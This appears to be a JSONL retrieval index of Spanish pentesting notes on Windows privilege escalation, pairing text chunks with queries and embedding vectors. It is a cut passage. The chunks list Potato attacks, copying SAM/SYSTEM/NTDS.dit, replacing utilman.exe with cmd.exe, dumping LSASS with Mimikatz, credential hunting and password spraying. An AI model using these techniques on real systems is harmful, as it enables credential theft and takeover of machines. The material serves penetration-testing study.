0.04196, 0.15071, 0.00504, 0.18214, 0.02342, 0.09194, -0.05889, -0.10042, 0.04892, -0.06594, -0.12087, -0.10564, 0.00892, 0.04502, 0.01353, 0.05315, -0.0161, -0.05746, -0.00204, 0.17809, 0.03672, 0.08879, -0.11148, -0.01984, -0.048, -0.05743, -0.04046, -0.01615, -0.05935, 0.05839, 0.01857, -0.1116, -0.00361, -0.08667, 0.1369, 0.05053, 0.02777, 0.00455, 0.00735, -0.08023, 0.05397, -0.09105, 0.01849, 0.02219, 0.02501, 0.0556, -0.09993, 0.02892, 0.09465, -0.08599, -0.16568, 0.09899, -0.04678, -0.00942, 0.05047, 0.03376, 0.04006, -0.06494, 0.10301, 0.02607, -0.05626, 0.04702, 0.15011, -0.01711, -0.03593, -0.00715, 0.03314, -0.14307, 0.06797, 0.06137, -0.04739, -0.00329, 0.01741, -0.12127, -0.01586, 0.05795, -0.05527, 0.03175, 0.02337, -0.0629, -0.04684, -0.08714, 0.01286, -0.0343, 0.0238, -0.07, -0.03675, 0.00733, -0.04978, 0.01397, 0.06139, 0.03519, 0.06328, -0.00997, -0.04996, -0.02206, -0.02886, -0.0168, -0.01471, -0.1107, -0.03705, 0.08888, -0.06695, 0.00162, -0.00807, 0.05524, 0.05221, 0.04831, -0.01362, 0.05542, 0.02554, 0.06015, -0.04133, 0.01721, -0.05026, -0.09696, 0.01273, -0.00385, 0.083, -0.08904, -0.00077, 0.00631, 0.0009, -0.05513, 0.09061, 0.03154, -0.02946, -0.03624, 0.0359, -0.02568, 0.00298, 0.01661, -0.00153, -0.02989, 0.02228, 0.0093, 0.14847, 0.05867, -0.08248, 0.09966, -0.14361, 0.05362, -0.09853, 0.00765, -0.01949, -0.00041, 0.02104, -0.07385, -0.02474, 0.00201, -0.03363, 0.02547, 0.03161, 0.02146, 0.0263, 0.04159, 0.02759, -0.02599, -0.07808, -0.02018, 0.03316, -0.00096, -0.04141, -0.03221, 0.02669, -0.05397, 0.00626, -0.03671, -0.00931, 0.03604, -0.03144, -0.03575, 0.00265, -0.03346, 0.05693, 0.05018, -0.00539, 0.06812, -0.01297, -0.0442, 0.02638, 0.04419, 0.00942, 0.02237, -0.03739, -0.01257, 0.04937, 0.05041, -0.01372, -0.03845, -0.00588, -0.03593, 0.04497, -0.04599, -0.01295, 0.01214, 0.00492, 0.01551, 0.04001, -0.00641, 0.00556, 0.0036, 0.02208, 0.04156, -0.00518, 0.03836, 0.04535, -0.01614, -0.01464, -0.07619, -0.00854, -0.07132, -0.02084, -0.02757, -0.04503, -0.04183, 0.0266, 0.02127, -0.02193, 0.00182, 0.02061]} +{"tipo": "pregunta", "herramienta": "Privesc Windows", "perfil": "PENTESTERS", "fichero": "conocimiento/04 - Privesc/Privesc Windows.md", "tema": "privesc", "fuente": null, "licencia": null, "texto": "# Privesc Windows\n\n> Tras la Reverse shell PowerShell: PEASS-ng (winPEAS) **+** revisiΓ³n manual. Camino a SYSTEM.", "indexar": "que herramienta sirve para detectar privilegios de administrador en Windows?", "v": [0.03631, 0.063, -0.14926, -0.336, 0.0654, -0.10225, -0.05276, -0.08951, -0.04969, -0.04992, 0.06022, -0.06375, -0.08126, -0.09577, 0.05914, 0.01444, 0.09266, -0.17567, 0.01988, 0.02521, 0.06466, 0.00263, -0.00293, 0.00845, -0.07765, -0.02699, 0.04069, -0.0605, -0.13863, 0.06817, 0.02288, -0.04335, -0.00036, -0.05413, -0.05765, -0.00361, -0.07556, 0.06616, 0.00488, 0.14338, 0.07768, 0.09785, -0.05047, 0.06745, 0.08927, -0.02548, -0.02124, -0.06075, 0.1021, 0.07423, 0.00309, -0.15201, -0.09474, -0.07019, 0.07925, -0.05185, 0.09255, -0.03438, 0.08867, -0.07629, -0.11269, 0.06655, -0.06398, 0.02, -0.04835, -0.02096, 0.08934, -0.07181, -0.01002, 0.06788, -0.08321, -0.03005, 0.09296, 0.03889, 0.02441, 0.06029, -0.00688, 0.04158, 0.12498, -0.0599, 0.08053, 0.0596, -0.08282, -0.02561, -0.06433, -0.15926, -0.0267, -0.01536, 0.0432, -0.10761, 0.02219, 0.03757, -0.03028, 0.00358, 0.07964, -0.0465, 0.11588, -0.02166, -0.00154, 0.06704, 0.12829, -0.1435, -0.05079, 0.15156, 0.00539, 0.07622, -0.03663, -0.08887, -0.09373, -0.07704, 0.01417, 0.0279, -0.01096, 0.02323, -0.02703, 0.12541, 0.01702, -0.04665, -0.04171, 0.01937, -0.03792, -0.01851, -0.07132, -0.03239, 0.05995, -0.09434, -0.02841, 0.09425, -0.02331, 0.00207, 0.00197, -0.05347, -0.0723, 0.00398, -0.12283, 0.05258, -0.02245, -0.06574, -0.01827, -0.04422, 0.01245, 0.06633, 0.01003, -0.06725, 0.09879, 0.02522, 0.0364, 0.02859, -0.03917, -0.03625, 0.05734, -0.09839, -0.04963, 0.02408, -0.08032, -0.02534, 0.01948, 0.09076, -0.02959, 0.02312, -0.02231, -0.07387, 0.00496, 0.01871, 0.06057, -0.03078, 0.02879, -0.02114, 0.08655, -0.02322, -0.0102, 0.02278, 0.03548, -0.00772, -0.04341, -0.0041, 0.02288, 0.01592, 0.01156, -0.028, -0.06446, 0.0254, 0.02667, -0.01387, -0.04281, -0.0188, -0.0276, 0.04673, -0.04736, 0.03903, 0.04713, 0.00144, 0.05698, -0.05944, 0.04974, 0.02081, 0.00047, -0.05713, 0.02006, -0.01272, -0.03026, -0.03802, -0.02617, -0.00768, 0.04225, 0.01648, 0.0064, 0.00399, 0.0776, 0.05908, 0.01725, 0.04345, 0.0164, -0.01395, -0.0303, -0.06, 0.04849, 0.0124, -0.02202, -0.03337, 0.01853, -0.03491, 0.06686, 0.01266, 0.03044, -0.05337, -0.06794, -0.00696, 0.03746, -0.00291, 0.0331, 0.00472, 0.04654, 0.0026, 0.00091, -0.08476, 0.0592, -0.05836, -0.01284, -0.02308, -0.03167, 0.03954, 0.03417, -0.05163, -0.06607, -0.04605, 0.01982, -0.04325, -0.02698, -0.06817, 0.02076, -0.02777, 0.06001, -0.04593, -0.02235, 0.06107]} +{"tipo": "pregunta", "herramienta": "Privesc Windows", "perfil": "PENTESTERS", "fichero": "conocimiento/04 - Privesc/Privesc Windows.md", "tema": "privesc", "fuente": null, "licencia": null, "texto": "# Privesc Windows\n\n> Tras la Reverse shell PowerShell: PEASS-ng (winPEAS) **+** revisiΓ³n manual. Camino a SYSTEM.", "indexar": "con que programa puedo analizar una shell remota para intentar acceder como sistema?", "v": [0.03133, 0.08651, -0.19886, -0.17689, 0.04712, -0.05948, -0.00711, -0.02051, -0.15376, 0.00403, -0.08452, -0.01311, 0.04531, -0.07566, 0.14221, 0.026, -0.03545, -0.04426, 0.0057, 0.02053, 0.06742, -0.06095, -0.05993, -0.02152, -0.04492, 0.01918, 0.01196, -0.01642, 0.03, -0.1191, -0.04871, -0.04548, 0.08785, -0.14692, -0.03703, 0.0428, 0.02643, 0.0506, 0.04534, 0.03745, 0.05694, -0.00685, -0.08591, 0.02335, 0.17386, -0.03076, 0.02108, -0.0417, -0.02079, -0.04363, -0.07128, -0.01666, -0.09386, -0.03234, 0.10119, -0.06734, 0.11815, -0.14169, 0.04592, -0.0317, -0.01726, 0.0506, 0.0455, -0.03752, 0.05857, -0.00023, 0.04105, -0.04872, -0.12507, 0.09992, -0.05387, -0.05481, 0.04084, -0.01717, -0.049, 0.05887, 0.00678, 0.00145, 0.08956, -0.05529, -0.05754, -0.05397, -0.04269, 0.1133, -0.08663, -0.12761, 0.02572, -0.04465, -0.03133, -0.06369, 0.01678, -0.04739, 0.04927, 0.13283, 0.04969, -0.03189, 0.08262, -0.0195, -0.07224, -0.01214, 0.00508, -0.02714, -0.1378, 0.1599, -0.06627, 0.06005, 0.08682, -0.02514, 0.01062, 0.02181, -0.04304, -0.02749, -0.05633, -0.08098, -0.09707, -0.0412, -0.11791, -0.05236, -0.00251, -0.04432, -0.06483, 0.0425, -0.1303, -0.02472, 0.08732, -0.01129, -0.00495, 0.07787, 0.02135, 0.07811, 0.04495, 0.08315, -0.06852, 0.0095, -0.04834, -0.02311, -0.02328, -0.0579, -0.02055, -0.04125, -0.01296, 0.10852, -0.00891, -0.01574, 0.07764, 0.00503, 0.00947, -0.06905, -0.05509, -0.02893, -0.00821, 0.0315, -0.03749, 0.06051, -0.07, -0.03732, 0.06363, -0.05655, -0.01836, 0.00431, -0.00994, -0.01372, -0.01444, -0.03531, 0.02846, -0.04094, -0.01309, -0.09144, 0.10822, 0.04704, -0.11145, 0.07241, 0.05374, -0.05633, 0.03082, -0.01714, 0.01402, -0.15616, 0.00861, -0.02821, -0.10356, 0.05285, 0.02057, -0.08206, -0.04742, 0.0095, -0.03037, 0.04834, 0.01223, 0.02575, 0.09761, 0.04025, -0.0215, 0.03155, 0.0331, 0.0079, -0.05364, -0.04731, 0.0376, 0.0125, -0.11049, 0.03717, 0.04587, -0.07197, 0.03755, 0.09022, 0.00366, 0.03614, 0.04431, 0.10952, 0.01779, -0.0482, 0.04882, -0.02363, -0.0526, 0.00186, -0.00971, 0.01173, 0.02547, 0.04559, 0.00182, 0.03905, 0.08579, 0.07794, -0.01254, -0.0313, 0.0644, 0.05435, 0.01216, -0.04331, -0.03208, -0.07275, 0.01701, -0.00495, 0.0103, -0.03412, -0.00364, -0.05338, -0.0502, -0.05792, 0.02771, 0.15528, -0.05109, -0.03515, -0.04753, -0.06503, -0.1022, -0.00112, 0.00936, -0.06099, -0.07495, 0.03672, 0.01532, -0.06453, 0.07479, 0.01135]} +{"tipo": "pregunta", "herramienta": "Privesc Windows", "perfil": "PENTESTERS", "fichero": "conocimiento/04 - Privesc/Privesc Windows.md", "tema": "privesc", "fuente": null, "licencia": null, "texto": "# Privesc Windows\n\n> Tras la Reverse shell PowerShell: PEASS-ng (winPEAS) **+** revisiΓ³n manual. Camino a SYSTEM.", "indexar": "cual es un mΓ©todo automΓ‘tico para subir escalones de usuario a administrador en Windows?", "v": [-0.0717, 0.08752, -0.13947, -0.17102, -0.12956, -0.06795, -0.05736, -0.14279, -0.14387, -0.08581, -0.11156, -0.17234, 0.00392, -0.00081, 0.03723, -0.11778, 0.15682, -0.10451, 0.01962, 0.11376, 0.05382, -0.05821, 0.0058, -0.00572, -0.05107, 0.05943, 0.06269, -0.03399, -0.14262, -0.08041, 0.06068, 0.05174, -0.02153, -0.07076, 0.00102, -0.033, -0.03088, 0.04664, -0.02928, 0.09883, -0.06561, 0.01147, -0.1509, 0.04191, 0.05787, 0.02708, 0.0616, -0.02257, 0.07202, -0.01673, 0.04246, -0.06848, -0.0475, -0.09491, 0.01485, -0.03583, 0.16676, -0.0666, 0.04088, -0.04411, 0.06108, 0.03667, -0.0095, 0.10475, -0.09833, -0.06065, 0.03438, 0.01303, 0.00227, 0.08219, 0.00729, -0.02501, -0.00359, -0.00764, 0.10999, 0.10328, -0.02019, -0.0063, 0.08899, -0.03067, 0.02403, -0.00505, -0.07288, 0.01946, -0.13461, -0.155, 0.01104, -0.1215, 0.03418, -0.03427, 0.07682, -0.15037, 0.02673, 0.01798, 0.09571, -0.09456, 0.0909, -0.06725, -0.036, 0.06405, 0.03725, -0.06977, -0.06653, 0.20264, -0.00311, 0.09278, 0.02234, -0.05838, -0.06503, -0.1024, 0.09515, 0.06708, -0.04508, -0.02756, -0.08384, 0.01481, -0.04939, -0.07991, -0.10631, 0.01806, -0.07787, -0.02479, -0.01826, -0.04476, 0.0628, -0.07975, 0.04513, 0.12489, -0.02856, 0.01104, 0.00352, -0.02124, -0.02499, -0.00749, -0.02991, 0.06503, -0.02041, 0.00239, 0.02523, -0.0367, 0.01005, 0.11836, 0.0316, -0.0685, 0.11742, -0.04476, 0.00753, -0.07478, -0.03171, -0.04183, 0.0123, -0.01259, 0.00822, 0.06426, 0.00162, -0.0424, 0.04645, 0.0124, -0.02504, 0.09097, 0.03201, 0.01533, 0.06568, 0.02046, -0.03949, -0.03565, -0.03968, -0.01622, 0.04248, -0.05543, -0.04474, 0.05706, -0.00651, -0.03498, 0.05795, 0.00694, -0.01149, -0.08409, 0.00385, 0.03681, -0.04538, 0.05362, -0.00312, -0.03576, -0.0602, -0.06578, -0.01544, 0.0631, -0.02806, 0.07269, -0.04134, 0.00995, -0.02801, -0.0474, -0.0009, 0.0038, -0.0031, 0.00694, 0.02153, -0.03237, -0.02519, -0.0077, -0.00741, -0.04912, 0.01665, -0.02661, -0.01128, 0.02697, 0.06444, 0.0518, 0.00719, -0.0158, 0.03367, -0.0183, -0.01552, -0.03525, -0.00181, -0.05711, -0.04333, -0.02555, 0.02516, 0.00312, 0.06248, 0.00296, -0.01338, -0.01843, -0.03806, 0.032, -0.02538, 0.01972, -0.06678, 0.04047, 0.04108, 0.01045, 0.05377, 0.02411, 0.07363, -0.06448, -0.05068, -0.06723, -0.00689, 0.04944, 0.04469, -0.04971, -0.09197, -0.04189, -0.04332, 0.06284, -0.01272, -0.06812, 0.05194, -0.0214, -0.02442, -0.0354, -0.03644, -0.0224]} +{"tipo": "pregunta", "herramienta": "Privesc Windows", "perfil": "PENTESTERS", "fichero": "conocimiento/04 - Privesc/Privesc Windows.md", "tema": "privesc", "fuente": null, "licencia": null, "texto": "## Los 10 olvidados\n```\n1. whoami /priv β†’ SeImpersonate/SeAssignPrimaryToken β†’ Potato attacks\n2. Unquoted services β†’ wmic service get name,pathname,startmode\n path con espacios sin comillas + carpeta escribible = exe propio\n3. AlwaysInstallElev. β†’ reg query HKLM\\...\\Windows\\Installer (ambos =1 β†’ msi = SYSTEM)\n4. Service permisos β†’ accesschk.exe -uwcqv user * (SERVICE_CHANGE_CONFIG)\n5. Creds en disco β†’ Unattend.xml, sysprep.inf, web.config, cmdkey /list, SAM/SYSTEM\n6. AutoLogon registro β†’ HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\n7. Pass spraying β†’ la pass del user normal contra admin/administrator/sa\n8. WSL / OpenSSH β†’ credenciales en .bash_history\n9. Scheduled tasks β†’ schtasks /query /fo LIST /v (scripts editables)\n10. UAC bypass + token impersonation\n```", "indexar": "que herramientas sirven para encontrar contraseΓ±as guardadas en archivos de configuraciΓ³n como .xml o .config?", "v": [0.29375, 0.00066, -0.06427, -0.23666, 0.00749, -0.17457, -0.07391, -0.07246, 0.01422, -0.03827, -0.15237, -0.06132, -0.06478, -0.10436, 0.04648, 0.01443, 0.08478, -0.07591, 0.05995, 0.0597, -0.07807, 0.0751, -0.02289, 0.00943, -0.11299, -0.06967, 0.09395, -0.01513, -0.25138, 0.01952, 0.01701, -0.03879, 0.0314, 0.07345, -0.07866, 0.12519, 0.02426, 0.10827, -0.07925, 0.06686, 0.04848, -0.03687, -0.05048, 0.11951, 0.00599, -0.0601, 0.05694, 0.05786, 0.07654, -0.02568, -0.0798, -0.07746, -0.05452, -0.02256, -0.00305, -0.07916, 0.16997, -0.11991, 0.04945, -0.04007, -0.16548, 0.06808, -0.01539, 0.13129, -0.1315, 0.00539, -0.0347, 0.01328, -0.12681, 0.07543, -0.00843, -0.01397, -0.07178, -0.00574, 0.02914, -0.0263, 0.07021, 0.02727, 0.05399, 0.09714, -0.0457, -0.01039, -0.04301, -0.02722, -0.1293, -0.02801, -0.01734, 0.01422, 0.01241, -0.11003, 0.08282, -0.01861, -0.07145, 0.03416, 0.05234, -0.05199, 0.01581, -0.00721, -0.00319, -0.06664, -0.0144, 0.02295, -0.01527, 0.15024, -0.02269, 0.03664, 0.02776, 0.01107, 0.02151, -0.07023, 0.09481, 0.06806, 0.03123, 0.03648, -0.00565, -0.06692, 0.02945, -0.0762, 0.01725, -0.03484, -0.0063, 0.01062, -0.00173, 0.04252, 0.04329, 0.07721, 0.03396, -0.01726, -0.00251, -0.04272, 0.03967, -0.10285, -0.05386, 0.03053, -0.05468, 0.00091, 0.03324, -0.06724, -0.11845, -0.04232, 0.06221, 0.00953, 0.0238, -0.00035, 0.14778, 0.04791, 0.02134, -0.00171, -0.01296, -0.05616, -0.01429, 0.00383, 0.03531, -0.0107, -0.0765, 0.05376, -0.0666, -0.06463, -0.08664, 0.07381, -0.02285, -0.05047, -0.03591, 0.0175, -0.03541, -0.06385, 0.01447, 0.06652, 0.06907, -0.00136, 0.01489, 0.04277, 0.01532, -0.06109, -0.02613, 0.001, -0.03549, -0.06588, 0.06397, -0.02015, -5e-05, -0.04903, -0.01451, 0.03358, 0.02327, -0.06104, 0.09491, -0.01454, -0.0734, -0.00134, 0.00387, -0.02415, -0.01621, 0.01288, 0.03451, -0.02402, -0.02118, -0.01053, -0.08553, -0.04982, 0.02045, -0.01252, -0.0304, -0.05009, 0.0373, 0.00154, -0.06592, -0.06356, -0.02248, 0.00355, 0.01396, -0.0088, 0.01696, -0.03534, -0.05452, -0.03667, -0.01043, 0.05205, 0.01588, -0.02449, 0.02391, 0.00065, 0.05741, -0.00308, 0.01827, -0.0319, -0.02601, -0.00154, 0.03921, -0.01193, -0.01699, -0.01268, -0.03351, 0.03269, 0.0508, -0.01702, -0.02751, -0.01909, -0.02274, 0.00991, -0.0399, 0.03777, 0.0457, -0.07196, -0.04176, -0.02816, -0.04951, 0.00012, 0.04725, -0.00383, 0.01732, 0.02765, 0.00349, -0.00744, -0.02777, -0.03866]} +{"tipo": "pregunta", "herramienta": "Privesc Windows", "perfil": "PENTESTERS", "fichero": "conocimiento/04 - Privesc/Privesc Windows.md", "tema": "privesc", "fuente": null, "licencia": null, "texto": "## Los 10 olvidados\n```\n1. whoami /priv β†’ SeImpersonate/SeAssignPrimaryToken β†’ Potato attacks\n2. Unquoted services β†’ wmic service get name,pathname,startmode\n path con espacios sin comillas + carpeta escribible = exe propio\n3. AlwaysInstallElev. β†’ reg query HKLM\\...\\Windows\\Installer (ambos =1 β†’ msi = SYSTEM)\n4. Service permisos β†’ accesschk.exe -uwcqv user * (SERVICE_CHANGE_CONFIG)\n5. Creds en disco β†’ Unattend.xml, sysprep.inf, web.config, cmdkey /list, SAM/SYSTEM\n6. AutoLogon registro β†’ HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\n7. Pass spraying β†’ la pass del user normal contra admin/administrator/sa\n8. WSL / OpenSSH β†’ credenciales en .bash_history\n9. Scheduled tasks β†’ schtasks /query /fo LIST /v (scripts editables)\n10. UAC bypass + token impersonation\n```", "indexar": "con que puedo verificar si hay servicios con permisos elevados que puedan ser comprometidos?", "v": [0.17717, 0.22827, -0.22664, -0.04056, 0.09245, -0.07396, 0.06457, -0.08016, -0.11991, -0.2404, -0.01676, 0.03197, 0.09575, -0.09193, 0.0768, 0.04385, 0.02487, -0.0145, 0.04082, 0.09651, 0.13942, -0.08232, -0.02477, -0.08244, -0.05311, 0.02501, 0.00829, -0.03956, -0.12212, -0.03829, 0.03142, -0.00019, -0.03391, -0.00393, 0.05325, 0.04086, -0.09974, 0.18714, 0.0714, -0.06715, -0.03229, 0.02112, 0.01973, -0.02264, 0.02022, -0.03227, -0.09242, -0.03217, -0.0273, -0.06257, -0.00632, -0.05563, -0.08533, -0.08366, -0.11446, -0.0151, 0.05286, 0.03388, -0.00991, -0.03168, -0.07319, -0.02984, 0.05306, 0.07292, 0.02632, 0.06662, 0.06125, 0.02374, 0.01857, 0.02037, -0.05296, 0.07836, 0.02371, -0.06028, -0.03995, -0.03916, -0.06301, -0.09513, 0.05389, -0.0056, 0.04314, 0.08822, -0.05827, -0.06645, -0.03349, -0.11966, -0.11523, -0.06328, 0.03692, -0.06604, 0.10051, 0.11034, 0.00011, 0.01233, -0.07796, 0.08377, 0.02087, 0.05999, -0.0429, 0.05188, 0.06534, 0.0539, 0.05168, 0.04958, -0.06591, 0.02434, 0.05131, -0.07149, -0.00672, 0.00213, 0.0274, 0.00546, -0.07805, -0.07621, -0.03025, -0.01251, -0.12014, -0.14804, -0.04747, -0.02195, -0.02073, -0.06349, 0.03198, 0.05552, 0.03827, 0.00446, -0.05489, 0.10931, -0.00586, 0.04066, 0.00422, 0.00601, -0.03159, 0.02514, -0.03299, 0.0082, -0.01541, -0.02054, -0.0208, 0.04413, 0.03478, 0.03496, 0.10152, -0.0129, 0.0688, 0.05154, -0.10402, -0.00704, -0.09045, -0.10078, -0.01716, 0.01873, -0.05201, 0.16745, -0.03666, 0.05947, -0.00907, -0.08178, 0.00992, 0.06349, 0.0241, 0.01476, 0.01576, 0.06794, 0.05352, 0.06432, -0.00553, 0.00484, 0.04215, 0.02553, -0.11064, 0.0039, 0.01654, -0.10046, 0.06801, 0.02852, -0.05107, -0.05016, 0.03911, -0.04841, -0.08332, -0.00544, -0.07661, -0.01573, -0.02814, -0.01089, -0.00314, -0.04229, 0.05582, -0.01838, 0.03173, 0.06947, 0.00759, 0.02506, 0.02467, -0.02241, -0.01199, 0.00601, -0.02798, -0.04466, -0.03402, -0.0282, -0.04245, -0.06764, 0.00163, -0.01282, -0.0082, 0.11523, -0.00194, 0.00584, -0.01193, -0.02572, 0.09278, -0.08345, -0.07592, 0.00631, 0.02265, -0.0187, -0.01123, -0.00074, 0.05415, -0.01302, 0.05532, -0.02843, 0.02869, -0.00267, 0.06867, 0.02798, 0.02546, 0.06861, -0.01172, 0.03109, -0.08111, -0.00026, 0.03407, 0.03657, 0.02286, -0.02704, -0.0435, -0.0746, 0.0242, 0.07398, -0.0021, -0.04491, 0.00792, -0.01846, -0.04537, -0.01104, -0.02022, -0.05903, 0.02263, 0.05139, -0.001, -0.03617, 0.07588, -0.06804]} +{"tipo": "pregunta", "herramienta": "Privesc Windows", "perfil": "PENTESTERS", "fichero": "conocimiento/04 - Privesc/Privesc Windows.md", "tema": "privesc", "fuente": null, "licencia": null, "texto": "## Los 10 olvidados\n```\n1. whoami /priv β†’ SeImpersonate/SeAssignPrimaryToken β†’ Potato attacks\n2. Unquoted services β†’ wmic service get name,pathname,startmode\n path con espacios sin comillas + carpeta escribible = exe propio\n3. AlwaysInstallElev. β†’ reg query HKLM\\...\\Windows\\Installer (ambos =1 β†’ msi = SYSTEM)\n4. Service permisos β†’ accesschk.exe -uwcqv user * (SERVICE_CHANGE_CONFIG)\n5. Creds en disco β†’ Unattend.xml, sysprep.inf, web.config, cmdkey /list, SAM/SYSTEM\n6. AutoLogon registro β†’ HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\n7. Pass spraying β†’ la pass del user normal contra admin/administrator/sa\n8. WSL / OpenSSH β†’ credenciales en .bash_history\n9. Scheduled tasks β†’ schtasks /query /fo LIST /v (scripts editables)\n10. UAC bypass + token impersonation\n```", "indexar": "hay alguna tΓ©cnica para detectar intentos de acceso no autorizado a cuentas administrativas?", "v": [0.14337, 0.2055, -0.15207, -0.16727, 0.12857, -0.07709, 0.04905, -0.02184, -0.20135, 0.0858, -0.118, -0.05936, -0.04367, 0.06429, 0.19808, -0.03774, 0.09541, -0.08768, 0.0528, -0.04721, 0.02065, -0.05307, -0.00725, 0.04218, -0.10614, -0.13741, -0.04161, -0.09655, -0.05423, -0.04286, 0.04989, 0.02213, 0.08469, 0.00979, 0.05715, -0.0182, -0.01688, -0.03822, 0.06635, 0.07552, 0.09776, 0.01731, -0.06952, -0.01357, 0.18235, -0.03269, 0.00643, 0.0532, -0.03068, -0.02878, 0.05723, -0.01346, -0.14629, -0.02669, -0.08016, -0.02504, 0.09809, 0.05167, 0.03775, -0.05293, -0.05012, -0.01912, 0.04833, 0.09068, -0.03748, 0.04095, 0.11584, -0.0017, -0.00086, 0.01912, -0.02362, 0.03698, 0.02013, 0.04853, -0.05543, -0.04899, 0.00859, -0.0309, 0.06987, -0.0593, -0.06503, -0.05265, 0.00374, 0.00183, -0.10176, -0.16853, -0.00283, -0.01188, 0.04981, -0.17215, 0.02261, -0.03949, 0.00294, 0.01195, 0.05036, 0.04974, -0.00156, 0.04861, -0.06038, 0.04208, 0.02112, 0.02025, -0.10661, 0.03352, -0.06995, 0.09187, -0.01215, -0.08053, 0.02404, -0.10667, -0.0959, 0.01953, -0.14606, 0.01649, -0.03648, 0.05713, -0.02103, -0.04206, -0.04239, 0.02174, -0.03974, -0.02787, -0.05565, 0.05739, -0.01121, -0.11692, -0.02884, 0.05141, 0.0279, 0.03469, 0.00813, -0.06898, -0.03332, 0.00521, -0.01056, 0.09947, -0.04732, -0.09228, -0.04111, 0.01482, -0.06071, 0.06086, -0.01839, -0.0339, 0.01896, 0.04398, -0.03321, -0.05997, -0.07154, 0.00469, 0.07318, -0.09139, -0.06492, 0.12592, -0.08716, 0.03224, 0.0185, -0.06155, -0.03253, 0.04108, -0.02556, 0.09812, -0.02037, 0.03384, -0.02797, -0.03788, -0.03298, -0.04374, 0.09779, -0.02566, -0.08663, 0.03574, -0.03509, 0.00393, 0.0105, -0.04355, -0.04918, -0.06935, 0.01828, -0.06528, -0.04617, -0.0234, 0.01763, -0.12866, 0.02812, -0.03454, -0.04238, -0.01318, 0.07978, -0.00601, 0.03448, -0.01411, -0.06759, 0.04155, 0.0032, 0.00748, -0.00318, 0.00091, -0.01215, -0.01528, -0.00017, 0.02848, -0.09246, 0.00702, -0.02356, 0.03154, -0.01655, 0.03949, -0.03561, -0.03283, 0.05714, -0.07907, 0.01752, -0.05754, -0.08557, -0.01562, -0.05558, -0.01583, -0.02124, 0.05848, -0.00358, -0.03143, 0.08892, 0.04583, 0.0419, -0.0389, 0.05591, -0.00419, 0.04127, 0.02602, -0.02636, 0.0464, -0.00872, 0.01399, -0.01519, -0.03948, 0.03178, -0.07156, -0.00809, -0.06388, 0.00601, 0.04635, 0.05194, -0.02718, -0.04278, -0.02878, -0.02208, 0.03219, -0.04117, -0.04954, 0.04184, 0.02081, 0.00601, -0.04035, 0.07851, -0.0241]} +{"tipo": "pregunta", "herramienta": "Privesc Windows", "perfil": "PENTESTERS", "fichero": "conocimiento/04 - Privesc/Privesc Windows.md", "tema": "privesc", "fuente": null, "licencia": null, "texto": "## Privilegios de token (SeXxxPrivilege)\n```\nSeImpersonate / SeAssignPrimaryToken β†’ Potato attacks\nSeBackupPrivilege β†’ lees ficheros restringidos (copias SAM/SYSTEM, NTDS.dit)\nSeRestorePrivilege β†’ escribes donde quieras: sustituye utilman.exe por cmd.exe\nSeDebugPrivilege β†’ vuelcas LSASS β†’ Mimikatz\nSeTakeOwnership β†’ te apropias de objetos protegidos\n```", "indexar": "que herramienta me sirve para copiar ficheros restringidos como copias SAM o SYSTEM", "v": [0.0169, -0.09965, -0.1623, -0.19537, 0.09095, -0.27918, -0.08315, -0.01162, -0.07666, -0.00862, -0.01737, -0.03978, 0.03757, -0.15334, 0.1986, 0.05667, 0.03535, -0.11882, -0.07062, 0.05623, 0.03255, -0.03404, -0.01373, -0.02933, 0.00502, 0.02488, 0.0834, -0.07837, -0.18069, 0.01034, 0.13304, 0.11036, 0.19831, -0.05251, -0.08644, -0.0788, -0.00882, -0.0234, -0.04865, 0.04509, 0.07499, 0.06025, -0.08644, 0.05918, 0.00481, -0.07137, -0.07262, -0.00458, 0.03928, 0.04631, -0.07802, -0.1203, -0.1431, -0.12446, -0.08628, -0.15568, 0.15723, -0.06963, -0.02805, 0.06106, -0.03925, 0.01998, 0.08258, -0.00221, 0.03422, -0.00421, 0.07992, -0.08532, -0.01578, 0.11584, -0.09303, 0.07249, 0.12152, -0.0546, -0.01483, 0.0101, -0.07638, -0.0928, 0.00142, 0.033, 0.00265, -0.12208, -0.02905, 0.00776, 0.05924, -0.04935, 0.04418, 0.0539, -0.01887, -0.07922, 0.02815, 0.01292, 0.0334, 0.021, -0.0039, 0.02689, -0.01408, -0.01905, 0.01024, 0.03373, 0.0922, -0.07329, -0.02574, 0.03816, -0.08216, 0.04285, 0.03087, -0.04795, -0.01169, -0.02419, 0.01343, 0.03259, 0.02346, 0.02933, -0.0144, -0.05516, 0.03137, 0.06613, -0.07046, -0.02381, 0.05964, -0.02912, -0.06177, -0.07607, 0.03708, -0.00664, -0.02433, 0.09262, -0.08422, -0.09712, -0.0233, 0.05682, -0.05705, 0.07056, 0.0588, -0.03943, -0.07077, -0.07028, -0.02876, -0.06833, -0.01977, 0.06784, -0.04535, -0.01497, -0.01946, 0.02309, 0.06224, 0.00447, -0.01909, -0.06666, -0.02013, -0.03227, -0.01788, 0.01987, 0.00103, 0.08376, 0.00118, -0.07673, -0.04125, 0.03389, 0.00217, 0.06089, 0.01004, -0.04271, 0.00944, -0.0182, 0.00254, -0.01803, 0.07724, 0.04486, -0.05757, -0.00329, 0.00264, -0.05945, 0.02676, -0.05247, -0.05326, 0.03366, -0.00559, -0.05719, -0.09207, 0.01499, 0.01147, -0.01066, 0.02825, -0.02617, 1e-05, 0.07493, 0.02992, 0.01555, 0.04254, 0.06483, 0.01774, -0.04927, -0.01071, 0.00265, -0.0183, 1e-05, 0.06159, 0.04956, -0.04151, -0.03919, -0.1061, -0.06578, 0.05178, 0.06442, -0.03788, -1e-05, -0.01207, 0.00656, -0.00475, 0.03873, 0.03629, -0.00877, -0.02401, -0.06893, -0.0022, 0.02734, 0.02213, -0.0719, 0.03935, 0.01939, 0.10123, 0.01594, -0.01125, 0.0392, 0.06499, -0.01233, 0.01416, 0.00276, 0.02175, 0.01018, -0.00282, 0.00685, 0.05467, -0.05072, -0.02395, -0.01026, -0.06169, -0.02162, -0.00813, 0.06134, 0.00987, -0.01863, -0.01297, -0.02596, -0.03234, -0.01366, 0.04382, -0.08351, 0.00292, -0.0012, 0.05923, -0.04771, 0.03302, -0.02608]} +{"tipo": "pregunta", "herramienta": "Privesc Windows", "perfil": "PENTESTERS", "fichero": "conocimiento/04 - Privesc/Privesc Windows.md", "tema": "privesc", "fuente": null, "licencia": null, "texto": "## Privilegios de token (SeXxxPrivilege)\n```\nSeImpersonate / SeAssignPrimaryToken β†’ Potato attacks\nSeBackupPrivilege 